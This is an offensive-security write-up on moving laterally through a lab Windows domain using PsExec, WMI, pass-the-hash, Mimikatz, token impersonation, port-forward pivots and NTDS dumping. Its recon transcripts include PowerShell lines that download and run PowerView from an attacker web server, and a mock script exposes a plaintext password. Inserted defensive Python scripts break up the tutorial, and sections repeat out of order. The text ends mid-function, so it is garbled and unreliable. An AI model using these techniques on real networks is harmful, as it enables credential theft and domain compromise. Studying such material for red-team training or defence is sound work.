Hello! In this write-up we will be looking at different ways to move laterally when compromising a Windows domain. This post is by no means exhaustive but it should cover some of the more basic techniques and thought processes. To keep things in perspective we will be following a mock objective on my local domain REDHOOK. Hopefully this will be the first in a series of posts centred around Windows domains, if you have something specific you would like to see (such as Kerberos tickets) don't hesitate to drop me an email, enjoy!
Scenario:
Our mission is to get usable credentials for the "redhook.DA" domain account. We are starting from a position where the attacker is already on the corporate network but not yet in the same subnet as the targeted domain controller. You can see a diagram of the setup below.
Additionally we are going to assume the attacker has found a set of valid local Administrator credentials for Client 1. Typically, if the network is large enough, you will find valid credentials stored on a network share somewhere (batch, vbs, .NET, ps1, etc.), "dir /s", "findstr /SI" and Find-InterestingFile are your friends. Depending on how initial access was gained you may have a nice framework to work with like Cobalt Strike or you may be limited to natively available functionality on a corporate workstation. For this post the attacker is on a Kali box but I will explain some things you can do when you only have access to Windows. Lastly, in the post, we will not be dealing with SRP & AV evasion, just keep that in the back of your mind because AV events = bad.
Resources:
+ Active Directory Security (@PyroTek3) - here
+ harmj0y (@harmj0y) - here
+ Exploit-Monday (@mattifestation) - here
+ PowerView - here
+ PowerSploit - here
+ Impacket - here
+ Impacket compiled by maaaaz - here
+ Mimikatz - here
+ Incognito - here
+ Windows Credentials Editor - here
+ Sysinternals Suite - here
We can quickly grab some NetBIOS information for the IP specified in the batch script.
You can do the same thing on Windows with "nbtstat -A IP". We can see that the machine name is WIN7-ENT-CLI1 and that it is connected to the REDHOOK domain.
PsExec:
With metasploit's PsExec we can easily get a shell on the box. Notice that bob is a local account, else the "net use" command would have specified "REDHOOK\bob". As such we are not using the SMBDomain parameter.
Metasploit doesn't have the only PsExec on offer. We can use Impacket's PsExec which emulates PsExec using RemComSvc. The nice thing here is that it will also take hashes if we don't have clear-text credentials, we will come back to that later.
Finally, let's not forget Microsoft's own PsExec which has the added benefit of being a signed executable. Adding the "-s" flag to this command would give you a SYSTEM shell.
WMI:
There are also a few WMI options when it comes to running remote commands. Most notably WMIC, not only will it allow you to execute commands on a remote machine but you can also leverage WMI to get sensitive information and reconfigure the operating system, all using built-in tools.
Obviously you will need to be a bit creative with "cmd.exe /c" and "powershell.exe -exec bypass -command" to make command execution work to your advantage. The upside here is that almost any box you pop will have this built-in.
Again, coming back to Impacket we have WmiExec which will allow you to run commands and get the output, it can also give you a semi-interactive shell and accepts hashes.
Finally there is PowerSploit's Invoke-WmiCommand, this is a bit more labour intensive because of the PSCredential object but you can get the command output and in-memory residence for the script.
Pass-The-Hash, WCE & Mimikatz:
Sometimes when you pop a box you will only have access to the NTLM hash for the user account, not the clear text password. If, in those cases, you have access to metasploit (psexec) or Impacket (pretty much all the tools support PTH) then you will have an easy time of it. If you are confined to the local Windows environment you can still inject the NTLM hash into a process using WCE or Mimikatz.
The downside here is that WCE is pretty much guaranteed to set off alarms! Mimikatz on the other hand can be loaded straight into memory using powershell w00t! In this case, however, I'm just using the compiled binary.
Notice that in both cases the domain is set to "." this is because bob is a local account but this will work perfectly fine for domain accounts as well.
We now have a lot of ways to get a shell on the box. This may seem a bit excessive but it is all about redundancy, some situations limit what you can do, other times a certain method will be overall more efficient for your intended goal. One thing you need to pay attention to is that the PsExec variants will all give you a SYSTEM shell while the WMI variants execute your commands as the user you authenticated to the box with. Again there are some cases where one or the other is desirable.
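A defender's counterpart to the PsExec-style shells above, added here as an example (it is not code from the write-up or from any of the tools it names): every PsExec variant installs a temporary service on the target, which Windows records as System-log event 7045. The script triages constructed 7045 records; the sample events, the flattened field layout and the three heuristics are this example's own assumptions.

```python
import re

# Constructed System-log 7045 ("A service was installed in the system")
# records, flattened to key=value fields the way a log forwarder might emit
# them. They are made up for this example, not events captured in the lab.
SAMPLE_7045 = [
    "host=WIN7-ENT-CLI1;ServiceName=PSEXESVC;ImagePath=%SystemRoot%\\PSEXESVC.exe;AccountName=LocalSystem",
    "host=WIN7-ENT-CLI1;ServiceName=kqRzXfVt;ImagePath=%SystemRoot%\\kqRzXfVt.exe;AccountName=LocalSystem",
    "host=WIN7-ENT-CLI1;ServiceName=pDmWlHcE;ImagePath=%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e SQBFAFgA;AccountName=LocalSystem",
    "host=WIN7-ENT-CLI1;ServiceName=wuauserv;ImagePath=%SystemRoot%\\system32\\svchost.exe -k netsvcs;AccountName=LocalSystem",
    "host=WIN7-ENT-CLI1;ServiceName=Vendor Agent;ImagePath=\"C:\\Program Files\\Vendor\\agent.exe\" /svc;AccountName=NT AUTHORITY\\NetworkService",
]

# Environment variables commonly seen in ImagePath, expanded for comparison.
ENV = {
    "%systemroot%": "C:\\Windows",
    "%windir%": "C:\\Windows",
    "%comspec%": "C:\\Windows\\system32\\cmd.exe",
}


def parse_event(line):
    """Split one flattened 7045 record into a dict of its fields."""
    fields = {}
    for part in line.split(";"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def executable_of(image_path):
    """Return the executable named by an ImagePath, with surrounding quotes
    stripped and a leading environment variable expanded."""
    path = image_path.strip()
    if path.startswith('"'):
        exe = path[1:path.index('"', 1)]
    else:
        exe = path.split(" ", 1)[0]
    for var, value in ENV.items():
        if exe.lower().startswith(var):
            exe = value + exe[len(var):]
            break
    return exe


def triage_7045(lines):
    """Return (host, service_name, reason) for installs that look like
    remote-execution tooling rather than normal software installation."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        name, image = ev.get("ServiceName", ""), ev.get("ImagePath", "")
        exe = executable_of(image)
        exe_dir, _, exe_name = exe.rpartition("\\")
        reason = None
        if "psexesvc" in (name + exe_name).lower():
            reason = "Sysinternals PsExec service (PSEXESVC)"
        elif exe_dir.lower() == "c:\\windows" and exe_name.lower().endswith(".exe"):
            # PsExec-style tools copy their service binary to ADMIN$, which is
            # the root of %SystemRoot%; legitimate services rarely live there.
            reason = "service binary dropped directly in %SystemRoot% (ADMIN$)"
        elif exe_name.lower() == "cmd.exe" and "powershell" in image.lower():
            # A "service" that is cmd.exe launching PowerShell is a command
            # payload, not an installed program.
            reason = "service image is a cmd.exe/powershell one-liner"
        if reason:
            findings.append((ev.get("host", "?"), name, reason))
    return findings


if __name__ == "__main__":
    for host, svc, why in triage_7045(SAMPLE_7045):
        print(f"{host}: service '{svc}' -> {why}")
```

The WMI variants from the same section install no service and so never produce a 7045; for those, process-creation logging on the target (WmiPrvSE.exe spawning cmd.exe or powershell.exe) is the equivalent signal.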
Metasploit (Mimikatz & hashdump):
Pretty straightforward from meterpreter. Use Mimikatz to get plain text credentials for users with an active session and hashdump to get hashes for local accounts that are not currently logged in.
Secretsdump & Invoke-Mimikatz:
To keep our alternatives open we can get the same results by using Impacket's SecretsDump and Powersploit's Invoke-Mimikatz. In this case Invoke-Mimikatz is hosted on the attacker's webserver, I have truncated the Mimikatz output for brevity.
There are naturally other ways you can tackle this but I think these are likely the main techniques.
Impersonation:
As we want to query domain specific information we will need a shell as a domain user. This is a bit problematic because we currently have a shell as either bob (not a domain user) or SYSTEM. Fortunately, using some undocumented NtQuerySystemInformation voodoo we can find tokens belonging to other user accounts and impersonate them, this is what the well known tool incognito is based on. Additionally, we know "REDHOOK\asenath.waite" is logged in to the machine so she will be a prime candidate.
Meterpreter has an incognito plug-in which makes this process very straightforward.
Alternatively you can use the actual incognito binary by Luke Jennings which has PsExec like functionality allowing you to use it remotely.
Finally, there is also PowerSploit's Invoke-TokenManipulation. Unfortunately, in its current state I can't recommend using it because we can't actually get the functionality we need out of it. I have filed 2 bug reports (#112 & #113), if these issues are resolved (specifically 113) then I will update this post because in my view using PowerShell to do token impersonation would be the best case scenario!
Domain Recon:
Now we have a shell as a domain user we need to do some quick enumeration to get a lay of the land and to figure out what our next target will be.
Socks Proxy:
One last thing I would like to highlight is metasploit's ability to route traffic through established sessions and then expose that access to the operating system through a socks proxy. This is very useful if you have access to metasploit or something like cobalt strike.
By creating a route through "session 1" we have basically granted most metasploit modules the ability to be executed against hosts in the non-routable /24 subnet.
Additionally, starting a socks proxy exposes this access to our operating system by using proxychains. Make sure to edit the proxychains configuration file to use the appropriate port set by the metasploit module.
There is only one thing you need to remember in this case which is that the socks proxy will only take TCP traffic. You will still be able to do most things but just be aware of this limitation.
It is not possible, using native functionality, to set up a socks proxy on a Windows machine. However, using netsh, we can create port forwarding rules, we will come back to that later. Also, if you want more, you can grab plink and do some magic with SSH tunnels but that is out of scope for this write-up.
Metasploit (PortProxy & PsExec):
Even though we can reach "Client 2" through our custom route in metasploit we will have difficulties getting a connection back. To get around this we can use the portproxy module to create a port forwarding rule on "Client 1".
This may seem a bit confusing at first but it is actually straightforward. "Client 1" is listening on 10.1.1.2:9988 and is sending any traffic that arrives on that port to 10.0.0.128:9988. In the background this is, in fact, wrapping around netsh in Windows. All that remains is to slightly reconfigure PsExec.
Impacket (PsExec) & netsh:
First we will need to manually set up a port forwarding rule, using netsh, on "Client 1".
We now have a rule set up which will forward traffic arriving on 10.0.0.129:5678 to 10.1.1.3:445. For this to work Impacket's PsExec will need to connect to a custom port, this is not supported out-of-the box but we can easily edit the python source.
With our modifications saved we can just PsExec to 10.0.0.129 and our traffic should get forwarded to 10.1.1.3!
Don't forget to clean up the port forwarding rule when you are done. The following command will reset the port proxy configuration.
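The defender-side check that the cleanup step implies, added here as an example (not code from the write-up): portproxy rules are stored under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy and survive reboots, so a forgotten rule is a durable bridge into the other subnet. The script parses constructed output of "netsh interface portproxy show all", modelled on the rule created above, and flags rules that forward to remote-management ports or bridge two /24s; the sample text, the port list and the /24 assumption are this example's own.

```python
import ipaddress
import re

# Constructed output of "netsh interface portproxy show all", modelled on the
# rule the write-up creates on Client 1 (10.0.0.129:5678 -> 10.1.1.3:445) plus
# two others for contrast. Sample text for this example, not captured output.
NETSH_OUTPUT = """\
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.0.0.129      5678        10.1.1.3        445
10.1.1.2        9988        10.0.0.128      9988
127.0.0.1       8080        127.0.0.1       8081
"""

# Ports whose forwarding almost always means remote administration or
# lateral movement rather than an application's own plumbing (assumed list).
SENSITIVE_PORTS = {22: "ssh", 135: "rpc", 139: "netbios", 445: "smb",
                   3389: "rdp", 5985: "winrm", 5986: "winrm-https"}

# One rule line: listen address, listen port, connect address, connect port.
RULE_RE = re.compile(r"^\s*(\S+)\s+(\d+)\s+(\S+)\s+(\d+)\s*$")


def parse_portproxy(text):
    """Return [(listen_ip, listen_port, connect_ip, connect_port), ...]."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # headers, separator rows and blank lines
        try:
            l_ip = ipaddress.ip_address(m.group(1))
            c_ip = ipaddress.ip_address(m.group(3))
        except ValueError:
            continue  # hostnames are allowed by netsh; out of scope here
        rules.append((l_ip, int(m.group(2)), c_ip, int(m.group(4))))
    return rules


def audit_portproxy(text):
    """Flag rules that look like pivoting: each finding is
    ("listen -> connect", [reasons])."""
    findings = []
    for l_ip, l_port, c_ip, c_port in parse_portproxy(text):
        reasons = []
        if c_port in SENSITIVE_PORTS:
            reasons.append(f"forwards to {SENSITIVE_PORTS[c_port]} ({c_port})")
        if not (l_ip.is_loopback or c_ip.is_loopback):
            # A listener on one /24 handing traffic to a different /24 is a
            # bridge between networks, the pattern built on Client 1 above.
            l_net = ipaddress.ip_network(f"{l_ip}/24", strict=False)
            if c_ip not in l_net:
                reasons.append(f"bridges {l_net} to {c_ip}")
        if reasons:
            findings.append((f"{l_ip}:{l_port} -> {c_ip}:{c_port}", reasons))
    return findings


if __name__ == "__main__":
    for rule, reasons in audit_portproxy(NETSH_OUTPUT):
        print(rule, "|", "; ".join(reasons))
```

Because the rules live in the registry, the same listing is worth taking after a reboot as well; "netsh interface portproxy reset" removes all of them at once.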
Pure Windows?:
Unfortunately I could not find a way, if the attacker is on a Windows box, to make this work natively. The issue is that tools like Sysinternals PsExec won't query non default ports. Additionally, if the attacker's machine has port 445 open it will ignore any port forwarding rules which we configure (eg: 127.0.0.1:445 --> 10.0.0.129:5678). Temporarily disabling SMB is also not an option, it requires reconfiguring dependencies and rebooting the machine (Yikes!). If anyone knows any voodoo that will work, please leave a comment below!
In this situation your best option will be to modify and compile Impacket's PsExec using pyinstaller, similar to what maaaaz has done here.
Keep in mind that either way it will most likely be game over. Even if we can't get clear text credentials we will still be able to find a process running as REDHOOK\Administrator and impersonate its token using incognito.
Metasploit Easy-Mode (Mimikatz & hashdump & incognito):
We were lucky in this case, or not so much as I've done it on purpose hehe! Let's briefly have a look at incognito though, just to cover our bases.
Impacket (PsExec) & incognito:
Again we have some limitations here because of the pivot. To illustrate the technique I'll show how we can use incognito on the remote host as it is a bit user unfriendly (unlike Invoke-Mimikatz).
After running the command our shell hangs (sigh..). I played around with this for quite a bit and I found that without the "-c" (interactive mode) parameter the shell does not hang but the command does not execute correctly, also if you don't group your commands in a bat file then it will only execute the first one before hanging. Just to be clear, this issue only happens when executing incognito through PsExec.
Although it is quite an ugly solution, once we log back in to the machine we can see that our batch script ran correctly.
If anyone can figure out a more elegant way to execute the incognito command, definitely leave a comment!
File Transfers:
Obviously I have gone a bit easy on myself, using the "put" command in Impacket's PsExec. Generally a good approach would be to download any files you may need onto the pivot box, you can use PowerShell's WebClient or something like bitsadmin. For some ideas, have a look at Parvez's post here. Once the files are in place you can just create an unrestricted Windows share and mount that from the host behind the pivot. You can see some example syntax below.
Socks Proxy & Impacket (WmiExec):
Remember that socks proxy we set up earlier? We can actually proxify almost everything we need to compromise the domain. The one caveat is that this obviously requires us to set up a socks proxy on the pivot. Here we are using Impacket's WmiExec just to switch things up a bit.
Simple right? Just don't rely on it too much in case it is not an option!
Sysinternals (PsExec) & Invoke-Mimikatz:
Time to complete our initial objective and get usable credentials for the REDHOOK\redhook.DA user account. This example is using Invoke-Mimikatz's ability to dump credentials on remote machines. Essentially, we get a shell on "Client 1" as REDHOOK\Administrator and then launch Mimikatz at the DC. We are assuming here that REDHOOK\redhook.DA has an active session on the box.
The reason that I'm only dumping hashes here is that, due to enhanced protection features on 2k12 R2/Windows 8.1+, we can't get clear text credentials for authenticated users. However, from the output we can see that we have managed to retrieve the REDHOOK\redhook.DA NTLM hash which will be more than enough to authenticate to other machines in the domain as that user.
Notice that we are just null padding the LM portion of the hash, it doesn't really matter what we put there. We are certainly not restricted to Impacket here, Metasploit's PsExec will also work fine as will forging the NTLM hash of a command prompt using WCE or Mimikatz.
Volume Shadow Copy (Classic-Mode):
The most basic, living off the land, way to do this is to use vssadmin.
After getting the files back to the attacker's machine (many ways to do this, pick one hehe) we can just use Impacket's SecretsDump locally and extract the contents. The output below is truncated for brevity.
Keep in mind that NTDS can literally contain thousands of user accounts and can be very large. Also, don't go outside your remit(!), dumping NTDS is likely to make Admins go absolutely ballistic!
A very similar approach can be used with Invoke-NinjaCopy, you can see an example of this in Sean Metcalf's post.
Socks Proxy & Impacket (SecretsDump) (Easy-Mode):
Again, ridiculous as it seems, if we have a socks proxy set up on the pivot we can just proxify SecretsDump and launch it against the DC using either plain text credentials or a hash!
Compromising Client 1
As I mentioned earlier, we "found" user credentials for "Client 1" on a network share. Something like this comes to mind.

    # Mock contents of \\FileServer\Users\bob\Workstations\ErrorLog.bat
    @echo off
    net use "\\10.0.0.129\C$" /user:bob ImSoSecur3!
    if exist "\\10.0.0.129\C$\Program Files\MSBuild\ErrorLog.txt" (
        echo "Sigh, more errors on Client1! Copying.."
        copy "\\10.0.0.129\C$\Program Files\MSBuild\ErrorLog.txt" C:\Users\bob\Logs\Client1\
        del "\\10.0.0.129\C$\Program Files\MSBuild\ErrorLog.txt"
    ) else (
        echo "Yaay, no new errors on Client1!"
    )
    net use "\\10.0.0.129\C$" /delete
Smash-And-Grab
Having gained a foothold on the new subnet it's time for a classic smash and grab. We want to harvest whatever credentials we have access to (clear text and hashes) and figure out where we can go from there.
Reconnaissance
Ok, now we have access to a machine in the REDHOOK domain which is also connected to a different subnet it's time for some recon!
    C:\Windows\System32> whoami
    redhook\asenath.waite

    C:\Windows\System32> hostname
    WIN7-Ent-CLI1

    C:\Windows\System32> ipconfig

    Windows IP Configuration

    Ethernet adapter Local Area Connection 2:

       Connection-specific DNS Suffix  . : localdomain
       Link-local IPv6 Address . . . . . : fe80::a1ba:a1ab:170c:7916%17
       IPv4 Address. . . . . . . . . . . : 10.0.0.129      # Attacker's subnet
       Subnet Mask . . . . . . . . . . . : 255.255.255.0
       Default Gateway . . . . . . . . . :

    Ethernet adapter Bluetooth Network Connection:

       Media State . . . . . . . . . . . : Media disconnected
       Connection-specific DNS Suffix  . :

    Ethernet adapter Local Area Connection:

       Connection-specific DNS Suffix  . :
       Link-local IPv6 Address . . . . . : fe80::5ddc:1e6:17e9:9e15%11
       IPv4 Address. . . . . . . . . . . : 10.1.1.2        # REDHOOK subnet
       Subnet Mask . . . . . . . . . . . : 255.255.255.0
       Default Gateway . . . . . . . . . : 10.1.1.1

    Tunnel adapter isatap.{8D0466B5-1F88-480C-A42D-49A871635C9A}:

       Media State . . . . . . . . . . . : Media disconnected
       Connection-specific DNS Suffix  . :

    Tunnel adapter isatap.localdomain:

       Media State . . . . . . . . . . . : Media disconnected
       Connection-specific DNS Suffix  . : localdomain

    Tunnel adapter isatap.{5CBBE015-1E1C-4926-8025-EBB59E470186}:

       Media State . . . . . . . . . . . : Media disconnected
       Connection-specific DNS Suffix  . :

    # A very small network, 3 hosts, including the one we have just compromised.
    C:\Windows\System32> net view
    Server Name            Remark
    -------------------------------------------------------------------------------
    \\REDRUM-DC            red.dc
    \\WIN7-ENT-CLI1
    \\WIN7-ENT-CLI2
    The command completed successfully.

    # The DC the user is authenticated to
    C:\Windows\System32> echo %logonserver%
    \\REDRUM-DC

    C:\Windows\System32> ping -n 1 REDRUM-DC

    Pinging redrum-dc.redhook.local [10.1.1.200] with 32 bytes of data:
    Reply from 10.1.1.200: bytes=32 time<1ms TTL=128

    Ping statistics for 10.1.1.200:
        Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
    Approximate round trip times in milli-seconds:
        Minimum = 0ms, Maximum = 0ms, Average = 0ms

    # List local users
    C:\Windows\System32> net user

    User accounts for \\WIN7-ENT-CLI1
    -------------------------------------------------------------------------------
    Administrator            bob                      Guest
    TemplateAdmin
    The command completed successfully.

    # List REDHOOK domain users
    C:\Windows\System32> net user /domain
    The request will be processed at a domain controller for domain RedHook.local.

    User accounts for \\Redrum-DC.RedHook.local
    -------------------------------------------------------------------------------
    Administrator            asenath.waite            Guest
    john.smith               krbtgt                   redhook.DA
    robert.suydam            wilbur.whateley
    The command completed successfully.

    # PowerSploit => Invoke-EnumerateLocalAdmin: Find all users who are local Administrators on a box in the network.
    C:\Windows\System32> powershell -exec bypass -command "IEX (New-Object System.Net.Webclient).DownloadString('http://10.0.0.128/PowerView.ps1');Invoke-EnumerateLocalAdmin"

    Server      : Redrum-DC.RedHook.local
    AccountName : RedHook.local/Administrator                      # Be careful, Administrator is a domain user
    SID         : S-1-5-21-129707511-1158432277-3818383092-500     # in this case, not a local user!
    Disabled    : False
    IsGroup     : False
    IsDomain    : True
    LastLogin   : 28/01/2016 21:38:22

    Server      : Redrum-DC.RedHook.local
    AccountName : RedHook.local/Enterprise Admins
    SID         : S-1-5-21-129707511-1158432277-3818383092-519
    Disabled    : False
    IsGroup     : True
    IsDomain    : True
    LastLogin   :

    Server      : Redrum-DC.RedHook.local
    AccountName : RedHook.local/Domain Admins
    SID         : S-1-5-21-129707511-1158432277-3818383092-512
    Disabled    : False
    IsGroup     : True
    IsDomain    : True
    LastLogin   :

    Server      : WIN7-ENT-CLI1.RedHook.local
    AccountName : WIN7-Ent-CLI1/Administrator
    SID         : S-1-5-21-280973330-564264495-219324212-500
    Disabled    : ERROR
    IsGroup     : False
    IsDomain    : False
    LastLogin   :

    Server      : WIN7-ENT-CLI1.RedHook.local
    AccountName : RedHook.local/Domain Admins
    SID         : S-1-5-21-129707511-1158432277-3818383092-512
    Disabled    : False
    IsGroup     : True
    IsDomain    : True
    LastLogin   :

    Server      : WIN7-ENT-CLI1.RedHook.local
    AccountName : WIN7-Ent-CLI1/bob                                # The local user bob is an admin on Client 1,
    SID         : S-1-5-21-280973330-564264495-219324212-1002      # we knew this already.
    Disabled    : ERROR
    IsGroup     : False
    IsDomain    : False
    LastLogin   :

    Server      : WIN7-ENT-CLI1.RedHook.local
    AccountName : WIN7-Ent-CLI1/TemplateAdmin                      # Mmm!
    SID         : S-1-5-21-280973330-564264495-219324212-1003
    Disabled    : ERROR
    IsGroup     : False
    IsDomain    : False
    LastLogin   :

    Server      : WIN7-ENT-CLI2.RedHook.local
    AccountName : WIN7-ENT-CLI2/Administrator
    SID         : S-1-5-21-1588183677-2924731702-2964281847-500
    Disabled    : ERROR
    IsGroup     : False
    IsDomain    : False
    LastLogin   :

    Server      : WIN7-ENT-CLI2.RedHook.local
    AccountName : RedHook.local/Domain Admins
    SID         : S-1-5-21-129707511-1158432277-3818383092-512
    Disabled    : False
    IsGroup     : True
    IsDomain    : True
    LastLogin   :

    Server      : WIN7-ENT-CLI2.RedHook.local
    AccountName : WIN7-ENT-CLI2/TemplateAdmin                      # Mmm², very suspicious, the local user
    SID         : S-1-5-21-1588183677-2924731702-2964281847-1004   # TemplateAdmin is an admin on both "Client 1" and "Client 2"!
    Disabled    : ERROR
    IsGroup     : False
    IsDomain    : False
    LastLogin   :

    # PowerSploit => Get-NetSession: List active, remote, logon sessions on the DC.
    C:\Windows\System32> powershell -exec bypass -command "IEX (New-Object System.Net.Webclient).DownloadString('http://10.0.0.128/PowerView.ps1');Get-NetSession -ComputerName REDRUM-DC"

    sesi10_cname                   sesi10_username   sesi10_time   sesi10_idle_time
    ------------                   ---------------   -----------   ----------------
    \\[fe80::18a3:b250:ed6a:28f0]  REDRUM-DC$        10            10
    \\10.1.1.2                     asenath.waite     0             0

    # Same for "Client 2". Crucially, notice that the domain user REDHOOK\Administrator is authenticated to the box and that the connection is originating from the DC!
    C:\Windows\System32> powershell -exec bypass -command "IEX (New-Object System.Net.Webclient).DownloadString('http://10.0.0.128/PowerView.ps1');Get-NetSession -ComputerName WIN7-ENT-CLI2"

    sesi10_cname   sesi10_username   sesi10_time   sesi10_idle_time
    ------------   ---------------   -----------   ----------------
    \\10.1.1.200   Administrator     1721          124
    \\10.1.1.2     asenath.waite     0             0

    # Let's get some more information about that account. Again, this is listing information about REDHOOK\Administrator, not the local administrator.
    C:\Windows\System32> net user Administrator /domain
    The request will be processed at a domain controller for domain RedHook.local.

    User name                    Administrator
    Full Name
    Comment                      Built-in account for administering the computer/domain
    User's comment
    Country code                 000 (System Default)
    Account active               Yes
    Account expires              Never

    Password last set            25/01/2016 21:15:11
    Password expires             Never
    Password changeable          26/01/2016 21:15:11
    Password required            Yes
    User may change password     Yes

    Workstations allowed         All
    Logon script
    User profile
    Home directory
    Last logon                   28/01/2016 21:38:22

    Logon hours allowed          All

    Local Group Memberships      *Administrators
    Global Group memberships     *Domain Users         *Domain Admins      # Oops, he is a DA!
    The command completed successfully.

    # We also won't forget to retrieve some information about our fictional target REDHOOK\redhook.DA.
    C:\Windows\System32> net user redhook.DA /domain
    The request will be processed at a domain controller for domain RedHook.local.

    User name                    redhook.DA
    Full Name                    redhook DA
    Comment
    User's comment
    Country code                 000 (System Default)
    Account active               Yes
    Account expires              Never

    Password last set            25/01/2016 21:27:37
    Password expires             Never
    Password changeable          26/01/2016 21:27:37
    Password required            Yes
    User may change password     Yes

    Workstations allowed         All
    Logon script
    User profile
    Home directory
    Last logon                   28/01/2016 21:18:56

    Logon hours allowed          All

    Local Group Memberships
    Global Group memberships     *Enterprise Admins    *Domain Admins      # Our target on the other hand is the
                                 *Group Policy Creator *Schema Admins      # mother root of DA's hehe!
    The command completed successfully.
Looking over the output of our brief search gives us a pretty likely path to becoming a domain administrator. (1) It appears that the local user TemplateAdmin is an admin on both "Client 1" and "Client 2". (2) Though we don't have clear-text credentials for TemplateAdmin we have his hash, which we can use to access "Client 2". (3) The REDHOOK\Administrator account is authenticated to "Client 2"; if we compromise that box while he is logged in we can get his clear text credentials and/or impersonate him. At that point we pretty much own the domain!
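Points (1) and (2) boil down to a single check that is just as useful on the defensive side: a non-domain account that is a local administrator on more than one host was almost certainly cloned from an image and shares a password across those hosts, which is exactly what LAPS-style per-host passwords prevent. The Python below is an added example (not PowerView's code or the author's) that runs that check over records in the layout Get-NetLocalGroup prints; the sample records are constructed from the lab output above.

```python
import re
from collections import defaultdict

# Constructed sample in the layout PowerView's Get-NetLocalGroup prints;
# the values mirror the lab records above (LastLogin/Disabled omitted).
SAMPLE = """
Server      : WIN7-ENT-CLI1.RedHook.local
AccountName : WIN7-Ent-CLI1/Administrator
SID         : S-1-5-21-280973330-564264495-219324212-500
IsGroup     : False
IsDomain    : False

Server      : WIN7-ENT-CLI1.RedHook.local
AccountName : RedHook.local/Domain Admins
SID         : S-1-5-21-129707511-1158432277-3818383092-512
IsGroup     : True
IsDomain    : True

Server      : WIN7-ENT-CLI1.RedHook.local
AccountName : WIN7-Ent-CLI1/TemplateAdmin
SID         : S-1-5-21-280973330-564264495-219324212-1003
IsGroup     : False
IsDomain    : False

Server      : WIN7-ENT-CLI2.RedHook.local
AccountName : WIN7-ENT-CLI2/TemplateAdmin
SID         : S-1-5-21-1588183677-2924731702-2964281847-1004
IsGroup     : False
IsDomain    : False
"""

def parse_records(text):
    """Split blank-line separated 'Key : Value' blocks into dicts."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in block.splitlines():
            key, sep, value = line.partition(":")
            if sep:
                rec[key.strip()] = value.strip()
        if rec:
            records.append(rec)
    return records

def shared_local_admins(records):
    """Map each local (non-domain, non-group) admin account name to the hosts
    it is an admin on, keeping only names present on 2+ hosts. Matching is by
    name: each host has its own machine-SID prefix, so SIDs never collide."""
    hosts = defaultdict(set)
    for rec in records:
        if rec.get("IsDomain") == "True" or rec.get("IsGroup") == "True":
            continue  # domain principals are expected on every member
        name = rec["AccountName"].split("/", 1)[-1].lower()
        hosts[name].add(rec["Server"])
    return {n: sorted(h) for n, h in hosts.items() if len(h) > 1}

if __name__ == "__main__":
    for name, servers in shared_local_admins(parse_records(SAMPLE)).items():
        print(f"{name}: local admin on {', '.join(servers)}")
```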
Before moving on, a surprise pop-quiz question: What is the most likely reason that "REDHOOK\Administrator" is part of the domain administrators group? I imagine this could be on the MCSA exam.
Socks Proxy:
One final thing I would like to highlight is metasploit's ability to route traffic through established sessions and then expose that access to the operating system through a socks proxy. This is really very useful if you have access to metasploit or something like cobalt strike.
By creating a route through "session 1" we have basically granted most metasploit modules the ability to be executed against hosts in the non-routable /24 subnet.
Additionally, starting a socks proxy exposes this access to our operating system by using proxychains. Make sure to edit the proxychains configuration file to use the appropriate port set by the metasploit module.
There is only one thing you need to remember in this case, which is that the socks proxy will only carry TCP traffic. You will still be able to do most things but just be aware of this limitation.
It is not possible, using native functionality, to set up a socks proxy on a Windows machine. However, using netsh, we can create port forwarding rules; we will come back to that later. Also, if you want more, you can look at plink and do some magic with SSH tunnels, but that is out of scope for this write-up.
Compromising Client 2
The shared local administrator account between "Client 1" and "Client 2", TemplateAdmin, is a pretty good indication that they have the same credentials. As such, compromising "Client 2" is not that much different from the scenario above, except that we have to pivot our shell and we need to use the account hash instead of the clear-text password. Below I'll show two ways to do this, but other options are certainly possible.
Metasploit (PortProxy & PsExec):
Even though we can reach "Client 2" through our custom route in metasploit we will have difficulties getting a connection back. To get around this we can use the portproxy module to create a port forwarding rule on "Client 1".
This may seem a bit confusing at first but it is actually straightforward. "Client 1" is listening on 10.1.1.2:9988 and is sending any traffic that arrives on that port to 10.0.0.128:9988. In the background this is, in fact, wrapping around netsh in Windows. All that remains is to slightly reconfigure PsExec.
Impacket (PsExec) & netsh:
First we will need to manually set up a port forwarding rule, using netsh, on "Client 1".
We now have a rule set up which will forward traffic arriving on 10.0.0.129:5678 to 10.1.1.3:445. For this to work Impacket's PsExec will need to connect to a custom port; this is not supported out-of-the-box but we can easily edit the python source.
With our modifications saved we can just PsExec to 10.0.0.129 and our traffic should get forwarded to 10.1.1.3!
Don't forget to clean up the port forwarding rule when you are done. The following command will reset the port proxy configuration.
C:\Windows\system32> netsh interface portproxy reset
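Because portproxy rules persist across reboots until they are reset, they are also worth enumerating from the defensive side: "netsh interface portproxy show all" lists them, and they are backed by the registry under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy. The Python below is an added example (not from the post or from any tool it uses) that parses that listing and flags rules which bridge subnets or forward to a lateral-movement port; the sample output is constructed from the two rules in this write-up, and the /24 mask is an assumption.

```python
import ipaddress
import re

# Constructed sample of "netsh interface portproxy show all" output holding
# the two rules created in this write-up (listener on the pivot -> target).
SAMPLE = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.1.1.2        9988        10.0.0.128      9988
10.0.0.129      5678        10.1.1.3        445
"""

# Service ports that are rarely bridged for a legitimate reason on a workstation.
LATERAL_PORTS = {135: "RPC", 445: "SMB", 3389: "RDP", 5985: "WinRM", 5986: "WinRM/TLS"}

# Rule lines are exactly four columns (addr port addr port); header and
# separator lines contain no digits in the port positions and never match.
RULE = re.compile(r"^\s*(\S+)\s+(\d{1,5})\s+(\S+)\s+(\d{1,5})\s*$")

def parse_portproxy(text):
    """Return (listen_addr, listen_port, connect_addr, connect_port) tuples."""
    rules = []
    for line in text.splitlines():
        m = RULE.match(line)
        if m:
            rules.append((m.group(1), int(m.group(2)), m.group(3), int(m.group(4))))
    return rules

def assess(rules, prefix=24):
    """Attach review reasons to each rule. The listener's subnet is assumed to
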